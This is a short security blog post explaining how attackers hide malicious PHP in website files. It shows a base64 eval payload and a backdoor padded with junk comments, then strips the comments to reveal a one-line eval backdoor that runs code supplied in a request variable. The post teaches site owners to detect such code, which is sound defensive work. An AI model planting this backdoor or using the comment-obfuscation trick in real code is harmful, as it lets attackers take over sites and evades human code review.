Hackers Attempting To Hide Malicious Code in Files With Comments

When hackers add malicious code to a website’s files they often obfuscate it in some way. A simple method looks like this:

eval(base64_decode(LypZYk9PKi9pZi8qX1U8ZkpPbTgqLygvKjdTU31NKi9pc3NldC8qT2FDKi8oLypyWE9KMyovJF9SRVFVRVNULypDMyEqL1svKlVpJiovJ2onLyohfk1lKi8uLyotaUJVJigqLydnJy8qKS41XGwqLy4vKm50YGpnbCovJ2snLypAXmo/Ki8uLypcOE13PF4qLyd2bycvKk47a3xCVyovXS8qOnM7Ki8vKjxAXXd+ISovKS8qUGQgKi8vKkJDRW1xKi8pLypWZ0xwbiovZXZhbC8qZStNcyE9PiovKC8qVERCISovc3RyaXBzbGFzaGVzLypeenBXbyovKC8qSGFMeVE7Ki8kX1JFUVVFU1QvKjo4TDYmVHMqL1svKnY+XWI1aXwqLydqJy8qak1lKi8uLyooSiZJOCovJ2cnLyooTUpnOiovLi8qdGo5LSovJ2snLyo3OVl8eU8qLy4vKnlsd2h3Ki8ndm8nLypBS08nXHMqL10vKm5TTDZ9Ki8vKmEySSovKS8qJX0hMyovLyo6VDZwZkAqLykvKjRKOlQmKi8vKlxZeWtEZW8qLzsvKmdpLWBEKi8=));

This method isn’t very effective as a method to disguise the code as the code will stick out and it is easy enough to do a search through all the files on a website for eval(base64_decode( and similar functions that are used, find matching code, and then undo obfuscation to check for malicious code. We sometimes see other methods are more effective, but more often than not the less effective ones are used. One other method that we have been seeing used a lot recently is hiding the code among numerous comments. Because comments are ignored when code is executed, the additional code only impacts someone trying to review the code. Here is one example of malicious code hidden among comments:

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/’j'/*jMe*/./*(J&I8*/’g'/*(MJg:*/./*tj9-*/’k'/*79Y|yO*/./*ylwhw*/’vo’/*AKO’\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

It probably looks like a bunch of gibberish to you. But amongst the apparent gibberish is the malicious code (shown in bold):

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/’j‘/*jMe*/./*(J&I8*/’g‘/*(MJg:*/./*tj9-*/’k‘/*79Y|yO*/./*ylwhw*/’vo‘/*AKO’\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

When the comments are stripped out you can see the code by itself:

if(isset($_REQUEST[jgkvo]))eval(stripslashes($_REQUEST[jgkvo]));

That code is a simple backdoor that will execute the code from the variable “jgkvo” when it is sent to a web page that the malicious code is in.